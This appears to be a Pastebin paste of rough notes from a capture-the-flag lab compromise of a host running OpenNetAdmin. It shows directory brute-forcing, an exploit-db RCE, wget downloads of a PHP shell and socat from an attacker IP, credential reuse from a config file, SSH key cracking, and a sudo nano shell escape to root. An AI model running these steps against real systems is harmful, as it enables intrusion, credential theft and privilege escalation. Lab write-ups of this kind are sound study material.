API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Mar 5th, 2020
1,785
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.40 KB | None | 0 0
raw download clone embed print report
  1. Threads: 10
  2. [+] Wordlist: /usr/share/dirb/wordlists/rockyou.txt
  3. [+] Status codes: 200,204,301,302,307,401,403
  4. [+] User Agent: gobuster/3.0.1
  5. [+] Timeout: 10s
  6. ===============================================================
  7. 2020/02/04 15:25:17 Starting gobuster
  8. ===============================================================
  9. /sierra (Status: 301)
  10. /music (Status: 301)
  11. [ERROR] 2020/02/04 15:25:30 [!] parse http://10.10.10.171/!@#$%^: invalid URL escape "%^"
  12. /marga (Status: 301)
  13. [ERROR] 2020/02/04 15:26:07 [!] parse http://10.10.10.171/!"£$%^: invalid URL escape "%^"
  14. [ERROR] 2020/02/04 15:26:11 [!] parse http://10.10.10.171/!@#$%^&*(): invalid URL escape "%^&"
  15. /?????? (Status: 200)
  16.  
  17.  
  18. Went to music... hit login button on music screen.. redirected to 10.10.10.171/ona/
  19.  
  20. used RCE exploit found here https://www.exploit-db.com/exploits/47691
  21.  
  22. ./script.sh http://10.10.10.171/ona/
  23. $ wget 10.10.14.23:9002/shell.php
  24. $ wget 10.10.14.23:9002/socat
  25. $ chmod +x socat
  26.  
  27. talk about getting new socat binary becauseo of nc not working and the architecture
  28.  
  29. drop meterpreter binary
  30.  
  31.  
  32. /opt/ona/www/local/config/database_settings.inc.php found db creds
  33.  
  34. $ona_contexts=array (
  35. 'DEFAULT' =>
  36. array (
  37. 'databases' =>
  38. array (
  39. 0 =>
  40. array (
  41. 'db_type' => 'mysqli',
  42. 'db_host' => 'localhost',
  43. 'db_login' => 'ona_sys',
  44. 'db_passwd' => 'n1nj4W4rri0R!',
  45. 'db_database' => 'ona_default',
  46. 'db_debug' => false,
  47. ),
  48. ),
  49. 'description' => 'Default data context',
  50. 'context_color' => '#D3DBFF',
  51. ),
  52. );
  53.  
  54. tried to connect to db didnt work..
  55. tried to su to jimmy ... used n1nj4W4rri0R! as pw
  56.  
  57. we in
  58.  
  59. Jimmy has permissions to a new directory /var/www/internal
  60. new internal webpage on port 52846
  61. use ssh portfowarding to be able to see the webpage on internal machine
  62. "ssh -L 9002:127.0.0.1:52846 [email protected]" on local host
  63. In the index file is a username and hash to the login of main.php
  64. use online hashcracker to solve
  65.  
  66. Gives private ssh key for joanna.
  67. crack key using ssh2john.py
  68. get passwd bloodninjas
  69.  
  70. ssh in using key
  71.  
  72. user.txt
  73. c9b2cf07d40807e62af62660f0c81b5f
  74.  
  75. sudo -l
  76. can use nano with no password to see /opt/priv root is also editng opt priv usinf GTFOnins escape shell with
  77. "
  78. sudo nano /opt/priv
  79. ^R^X
  80. reset; sh 1>&0 2>&0
  81.  
  82. root shell
  83.  
  84. root.txt
  85. 2f907ed450b361b2c2bf4e8795d5b561
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!